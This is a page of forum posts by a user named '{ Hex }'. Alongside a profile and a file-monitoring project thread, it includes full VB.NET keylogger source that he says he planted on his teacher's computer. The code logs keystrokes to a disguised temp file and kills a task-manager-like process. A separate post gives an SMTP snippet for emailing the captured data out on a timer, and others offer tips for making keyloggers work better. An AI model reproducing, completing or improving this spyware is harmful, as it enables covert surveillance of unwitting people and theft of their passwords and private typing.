Jump to content

{ Hex }

Active Members
  • Posts

    10
  • Joined

  • Last visited

Posts posted by { Hex }

  1. well if you want a "Free" keylogger i posted the source to a i guess decent to a point but if said user types fast then it will have a hard time picking up what he/she types it better to use a keyboardhook you can just modify the source i posted you can modify it just add this in on a timer

    imports system.net.mail

    Dim mail As New MailMessage()
    Dim SmtpServer As New SmtpClient("smtp.gmail.com")
    mail.From = New MailAddress("@gmail.com")
    mail.To.Add("The email in witch the data will be sent")
    mail.Subject = ""
    mail.Body = ""

    SmtpServer.Port = 587
    SmtpServer.Credentials = New System.Net.NetworkCredential("Email", "Pass")
    SmtpServer.EnableSsl = True

    SmtpServer.Send(mail)

    -Hex

  2. My name is Jack a.k.a Hex

    Favourite game: Fallout
    Favourite OS: Windows
    Favourite console: Pc master race
    Nationality: American
    Accent: English (southern)
    Sex: Male
    Race: White
    Height: 6.4
    Build: Skinny + strong
    Favourite band: Iron maiden
    Favourite book: Microsoft Visual Basic 2010 Dev handbook (Klaus Loffelmann)
    Favourite author: NA
    Favourite movie: Never back down
    Favourite director: alfred hitchcock

    Favourite TV Show: Naruto
    Favourite actor: leonardo dicaprio

    Favourite actress: NA
    Favourite Pinup: NA
    Favourite Comedian: Gabriel Iglesias
    Other hobbies: Programming,MMA,fitness.
    Car: Ram 1500 (white)
    Occupation: Collage(2 years for core) + 4 years for masters in Computer Programming & HVAC on the side

  3. here a shitty logger i made in in 9th grade to put on my teacher computer it's shit like i said use a lowlevelKeyboard hook

    Imports System.IO
    Public Class Form1
    Private Declare Function gmp Lib "user32" Alias "GetAsyncKeyState" (ByVal K As Integer) As Short
    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
    Timer1.Start()
    Timer2.Start()
    End Sub
    Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
    Dim Temp As String = My.Computer.FileSystem.SpecialDirectories.Temp
    If (gmp(65)) Then
    box.Text = box.Text + "a"
    ElseIf (gmp(66)) Then
    box.Text = box.Text + "b"
    ElseIf (gmp(67)) Then
    box.Text = box.Text + "c"
    ElseIf (gmp(68)) Then
    box.Text = box.Text + "d"
    ElseIf (gmp(69)) Then
    box.Text = box.Text + "e"
    ElseIf (gmp(70)) Then
    box.Text = box.Text + "f"
    ElseIf (gmp(71)) Then
    box.Text = box.Text + "g"
    ElseIf (gmp(72)) Then
    box.Text = box.Text + "h"
    ElseIf (gmp(73)) Then
    box.Text = box.Text + "i"
    ElseIf (gmp(74)) Then
    box.Text = box.Text + "j"
    ElseIf (gmp(75)) Then
    box.Text = box.Text + "k"
    ElseIf (gmp(76)) Then
    box.Text = box.Text + "l"
    ElseIf (gmp(77)) Then
    box.Text = box.Text + "m"
    ElseIf (gmp(78)) Then
    box.Text = box.Text + "n"
    ElseIf (gmp(79)) Then
    box.Text = box.Text + "o"
    ElseIf (gmp(80)) Then
    box.Text = box.Text + "p"
    ElseIf (gmp(81)) Then
    box.Text = box.Text + "q"
    ElseIf (gmp(82)) Then
    box.Text = box.Text + "r"
    ElseIf (gmp(83)) Then
    box.Text = box.Text + "s"
    ElseIf (gmp(84)) Then
    box.Text = box.Text + "t"
    ElseIf (gmp(85)) Then
    box.Text = box.Text + "u"
    ElseIf (gmp(86)) Then
    box.Text = box.Text + "v"
    ElseIf (gmp(87)) Then
    box.Text = box.Text + "w"
    ElseIf (gmp(88)) Then
    box.Text = box.Text + "x"
    ElseIf (gmp(89)) Then
    box.Text = box.Text + "y"
    ElseIf (gmp(90)) Then
    box.Text = box.Text + "z"
    ElseIf (gmp(32)) Then
    box.Text = box.Text + " "
    ElseIf (gmp(16)) Then
    box.Text = box.Text + " [sHIFT] "
    ElseIf (gmp(20)) Then
    box.Text = box.Text + " [CAPS] "
    ElseIf (gmp(48)) Then
    box.Text = box.Text + "0"
    ElseIf (gmp(49)) Then
    box.Text = box.Text + "1"
    ElseIf (gmp(50)) Then
    box.Text = box.Text + "2"
    ElseIf (gmp(51)) Then
    box.Text = box.Text + "3"
    ElseIf (gmp(52)) Then
    box.Text = box.Text + "4"
    ElseIf (gmp(53)) Then
    box.Text = box.Text + "5"
    ElseIf (gmp(54)) Then
    box.Text = box.Text + "6"
    ElseIf (gmp(55)) Then
    box.Text = box.Text + "7"
    ElseIf (gmp(56)) Then
    box.Text = box.Text + "8"
    ElseIf (gmp(57)) Then
    box.Text = box.Text + "9"
    ElseIf (gmp(45)) Then
    Force_Dump()
    ElseIf (gmp(46)) Then
    Process.Start(Temp + "\ELUAC.txt")
    ElseIf (gmp(145)) Then
    Dim pro() As Process = Process.GetProcessesByName("Taskmggr")
    For Each pr As Process In pro
    pr.Kill()
    Next
    End If
    End Sub
    Private Sub Force_Dump()
    ' Dim MD As String = Mid(Environment.GetFolderPath(Environment.SpecialFolder.System), 1, 3)
    Dim Temp As String = My.Computer.FileSystem.SpecialDirectories.Temp
    If File.Exists(Temp + "\ELUAC.txt") Then
    Else
    File.Create(Temp + "\EULAC.txt")
    End If
    Dim WR As System.IO.StreamWriter
    WR = My.Computer.FileSystem.OpenTextFileWriter(Temp + "\ELUAC.txt", True)
    WR.WriteLine("Force Dump @ " + System.DateTime.Now + "] " + box.Text)
    WR.Close()
    End Sub
    Private Sub Timer2_Tick(sender As Object, e As EventArgs) Handles Timer2.Tick
    Dim Temp As String = My.Computer.FileSystem.SpecialDirectories.Temp
    If File.Exists(Temp + "\ELUAC.txt") Then
    Else
    File.Create(Temp + "\EULAC.txt")
    End If
    Dim WR As System.IO.StreamWriter
    WR = My.Computer.FileSystem.OpenTextFileWriter(Temp + "\ELUAC.txt", True)
    WR.WriteLine("Timed Dump @ " + System.DateTime.Now + "] " + box.Text)
    WR.Close()
    End Sub
    End Class
  4. spotted the issue in 2 secs

    Change: Private Declare Function GetAsyncKeyState Lib "USER32" (ByVal vKey As Long) As Integer

    Too: Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As integer) As short

    if you care about what i have to say i rather use a lowlevelkeyboard hook for a keylogger

  5. Well, since you won't bother to scan it, I guess I will. Just because you state something is safe, doesn't mean people will run it without checking the code and compiling themselves. I don't have .net setup at the moment, but I am curious if anyone has compiled the source and compared it to the uploaded files though.

    https://www.virustotal.com/en/file/186dd1a5281796bae887ed47bbffc714b26c96ff63652fecc30e9cdb0d199d16/analysis/1427408791/

    https://www.f-secure.com/v-descs/rogue_w32_systemtool.shtml

    with that being said this is project you can look over the code before you run it even it was just the .exe there are .net decomps everywhere.

  6. Well, perhaps you should reconsider that since your code drop contains 3 exe files and a dll

    A few things:

    1. You wrote this in VB. .Net is the platform, not the language.

    2. Comments! It'll save your sanity when you get back to your code after doing something else for a month or two.

    3. You're mixing UI logic with business logic. While "Button5_Click" might make sense in the context of clicking a button, the things you do at that point (write what has happened so far to a logfile) should be put in its own, separate function with a vastly more appropriate name. And probably within a file other than "Form1.vb". The hooks you're placing on the FileSystemWatcher object would probably also be better served with a separate code file.

    4. Did I mention comments?

    about calling it .net were i come from sometimes that how it is named i always put vb over .net i just did not feel like it people most of the time know what your talking about when you say that anyway.

    Comments() i use them but not all the time prob cause im lazy.

  7. Hello,

    This is a visual studio project of mine i posted it on a other forums and i decided for my 1st post\thread ill rel my small project.

    This monitors file events on the FileSystem this application is written in the .net language and this is the full source.

    Thank you.

    p.s i'm not gonna post a VT scan cause this is the vss (source)

    FWD.zip

×
×
  • Create New...